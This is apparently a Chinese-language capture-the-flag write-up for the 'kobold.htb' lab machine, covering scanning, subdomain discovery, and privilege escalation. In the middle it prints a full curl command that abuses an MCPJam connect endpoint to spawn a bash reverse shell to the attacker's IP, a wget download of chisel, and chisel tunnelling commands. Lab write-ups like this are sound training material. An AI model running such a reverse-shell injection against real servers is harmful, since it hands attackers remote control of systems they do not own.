type
Post
status
Published
date
May 12, 2026
slug
summary
tags
category
category (1)
icon
password
comment
靶机ip:
10.129.245.50 本机ip:
10.10.16.170先用fscan扫描端口
访问一下80端口
扫描子域名
得到两个子域名
bin.kobold.htb mcp.kobold.htb访问mcp子域名
去网上查找MCPJam是否有相关的漏洞
进行反弹shell
curl https://mcp.kobold.htb/api/mcp/connect --header "Content-Type: application/json" --data "{\"serverConfig\":{\"command\":\"bash\",\"args\":[\"-c\", \"bash -i >& /dev/tcp/10.10.16.170/8085 0>&1\"],\"env\":{}},\"serverId\":\"mytest\"}" -k
本来想着直接用最新的cve内核提权的,但是没ben的密码
使用
ps -ef 查看进程
发现docker容器的8080端口被映射到了本地的8080端口上,这边我们不知道ssh连接的密码,所以内网的端口映射我们得依靠chisel不能用ssh
上传chisel到靶机
wget http://10.10.16.170:8000/chisel 
在靶机上执行
chisel server -p 1337 --reverse
在本机上执行
chisel client 10.129.245.50:1337 127.0.0.1:8080:127.0.0.1:8080
本地访问发现就是和dev.kobold.htb域名的网站一样,跳过
最后选择直接非预期,用最近出现的提权漏洞CVE-2026-31431(称为 "Copy Fail")
- 作者:qetx
- 链接:http://qetx.top/article/35eb233d-8731-809e-889a-d1987f3a34c6
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
